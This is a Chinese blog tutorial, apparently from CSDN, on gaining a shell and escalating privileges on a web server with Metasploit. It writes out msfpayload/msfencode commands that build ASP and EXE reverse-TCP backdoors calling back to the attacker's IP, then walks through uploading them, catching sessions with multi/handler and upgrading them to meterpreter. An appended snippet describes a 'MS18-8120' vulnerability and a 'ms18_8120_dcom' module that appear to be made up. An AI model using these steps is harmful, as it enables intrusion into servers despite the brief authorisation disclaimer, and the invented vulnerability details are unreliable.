php渗透提权拿shell,Metasploit 之 webshell 提权

本文所涉及的方法只能在已授权的机器上做测试。

首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大

^_^)

Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe

型后门,一可以生成网页脚本类型的webshell ,通过生成webshell

然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。

下面是具体的利用方法。

我们可以通过指令查看msf里的payload

然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:

产生webshell

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip |

msfencode -t asp -o webshell.asp

然后将此webshell上传到服务器(这个步骤要有上传权限。)

然后启动msfconsole

输入use exploits/multi/handler,

set PAYLOAD

windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。

set LHOST your_ip,

执行exploit,

然后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp

,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter

shell,如果meterpreter不会用网上查一下,很多。

但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。

这里产生的是asp的webshell

也可以产生php webshell,jsp webshell 需要在msfencode时用-t

参数指定脚本类型,我认为php类型的webshell更容易成功。

另外如果获取服务器拥有可以上传并且执行上传文件的权限的话,可以上传一个msfpayload产生的后门,设置监听,然后执行后门,返回一个

session然后将session转为meterpreter,这样就可以方便的使用meter各种特性了。给个步骤:(前提在上边以及说明了)

1、msfpayload windows/shell_reverse_tcp LHOST=your_ip R |

msfencode -t exe -o test.exe

2、打开msfconsole (另外开一个terminate终端)

3、设置监听(监听这个词好像很高级,别被它吓到):use exploits/multi/handler,set

LHOST=your_ip,执行exploit

4、将test.exe 上传到服务器

5、在服务器上执行test.exe 就可以返回一个shell了。

6、将windows shell 转成 meterpreter

shell:由于使用的payload是shell_reverse_tcp,看名字就知道了返回一个shell,可以在监听器看到返回了一个

windows shell(windows 命令提示符),而不是一个meterpreter shell,这样就要转换了,方法是

按下Ctrl + z 使 windows shell 后台运行,然后sessions 指令查看 shell

的session是多少

,然后执行 sessions -u number(number为你找到的windows shell

session号。这样就产生了一个meterpreter

shell,可以利用meterpreter强大的功能。也有可能出错,仔细看出错信息然后复制其一部分google一下。

可能读者些疑问:既然可以在上传执行exe文件,为什么要用msf呢,直接上传一个强大木马不是更方便么。我想说因为msf

中有个强大的Meterpreter。

总结,可以发挥想象,挨个试试payloads有的payloads 不能用,也许有意外的发现。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS18-8120是一个Windows漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来升他们的限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查结果:漏洞利用模块运行后,我们可以检查结果。使用以下命令检查当前用户的限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功升了我们的限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows攻击。但是请注意,任何未经授的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值